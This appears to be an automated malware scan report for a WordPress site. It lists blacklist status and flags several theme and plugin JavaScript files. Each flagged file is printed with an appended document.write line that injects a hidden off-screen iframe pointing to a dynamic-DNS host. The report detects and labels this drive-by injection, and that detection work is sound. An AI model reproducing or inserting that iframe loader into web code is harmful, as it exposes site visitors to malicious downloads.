Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zionsafehaven.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zionsafehaven.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.zionsafehaven.org/ | 200 OK Content-Length: 8199 Content-Type: text/html | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/custom.js?ver=1 | 200 OK Content-Length: 4655 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.rdy = function(func) { this.length && func.apply(this); return this; }; function getParameterByName(name, hash) { var url = hash ? window.location.hash.replace('#', '?') : window.location.search; var match = RegExp('[?&]' + name + '=([^&]*)').exec(url); return match && decodeURIComponent(match[1].replace(/\+/g, ' ')); } jQuery.fn.placeHolder = function(default_value) { var el = jQuery(this); default_value return false; }); }); $("ul.nav").superfish({ delay: 200, animation: { opacity: 'show', height: 'show' }, speed: 'fast', autoArrows: false }); }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 27329 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } method = this.attr('method'); action = this.attr('action'); url = (typeof action === 'string') ? $.trim(action) : ''; url = url || window.location.href || ''; var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/contact-form-7/scripts.js?ver=3.0.1 | 200 OK Content-Length: 5980 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) {
$(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/test404page.js | 404 Not Found Content-Length: 7996 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=4.0 | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/superfish.js?ver=4.0 | 200 OK Content-Length: 3892 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/jquery.quicksand.min.js?ver=4.0 | 200 OK Content-Length: 3478 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/easing.js?ver=4.0 | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/slides.js?ver=4.0 | 200 OK Content-Length: 8186 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.slides=function(g){g=$.extend({},$.fn.slides.option,g);return this.each(function(){$('.'+g.container,$(this)).children().wrapAll('<div class="slides_control"/>');var d=$(this),control=$('.slides_control',d),total=control.children().size(),width=control.children().outerWidth(),height=control.children().outerHeight(),start=g.start-1,effect=g.effect.indexOf(',')<0?g.effect:g.effect.replace(' ','').split(',')[0],paginationEffect=g.effect.indexOf(',')<0?effect:g.effect.r ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/login-box/login-box-script.js | 200 OK Content-Length: 1590 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function loginbox_show() { if (loginbox.fade) { jQuery("#loginbox").fadeIn(); } else { jQuery("#loginbox").show(); } jQuery("#user_login").focus(); } function loginbox_hide() { if (loginbox.fade) { jQuery("#loginbox").fadeOut(); } else { jQuery("#loginbox").hide(); } } function loginbox_toggle() { if (jQuery("#loginbox").css("display") == "none") { loginbox_show(); } else { lbkey.indexOf(key) != -1 ? keye = true : keye = false; if (keye && lbauxkey) { loginbox_toggle(); return false; }; }); jQuery(function() { jQuery("[rel*='loginbox-toggle']").click(function(){ loginbox_toggle(); return false; }); }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/login-box/wpclassic/scripts.js | 200 OK Content-Length: 777 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function() { boxwidth = 380; boxheight = 400; windowwidth = self.innerWidth || jQuery.boxModel && document.documentElement.clientWidth || document.body.clientWidth; windowheight = self.innerHeight || jQuery.boxModel && document.documentElement.clientHeight || document.body.clientHeight; posx = (windowwidth - boxwidth) / 2; posy = (windowheight - boxheight) / 2; jQuery("#loginbox").css({ left: posx + "px", top: posy + "px" }); });;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/project/portfolio-post-number-one/ | 200 OK Content-Length: 12133 Content-Type: text/html | clean |
http://www.zionsafehaven.org/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/project/portfolio-post-number-four/ | 200 OK Content-Length: 11870 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zionsafehaven.org
Result:
GET / HTTP/1.1
Host: zionsafehaven.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zionsafehaven.org
Referer: http://www.google.com/search?q=zionsafehaven.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zionsafehaven.org
Referer: http://www.google.com/search?q=zionsafehaven.org
Result:
The result is similar to the first query. There are no suspicious redirects found.